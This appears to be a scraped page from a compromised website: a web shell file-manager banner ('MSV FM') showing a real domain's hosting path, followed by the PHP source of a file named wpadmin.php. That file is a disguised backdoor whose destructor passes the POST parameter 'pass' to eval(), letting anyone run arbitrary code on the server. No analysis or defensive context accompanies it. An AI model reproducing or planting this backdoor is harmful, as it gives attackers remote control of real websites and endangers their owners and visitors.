MSV FM

dot.antimicrobial@66.96.161.157: ~ $
Path : /hermes/bosweb/b1705/electricalrepairatlanta.com/
File Upload :
Current < : /hermes/bosweb/b1705/electricalrepairatlanta.com/wpadmin.php

<?php
class  Test{
    public $name = '';
    function __destruct(){
        @eval("$this->name");
    }
}

$test= new Test();
$c = @$_POST['pass'];
$test->name = $c;
?>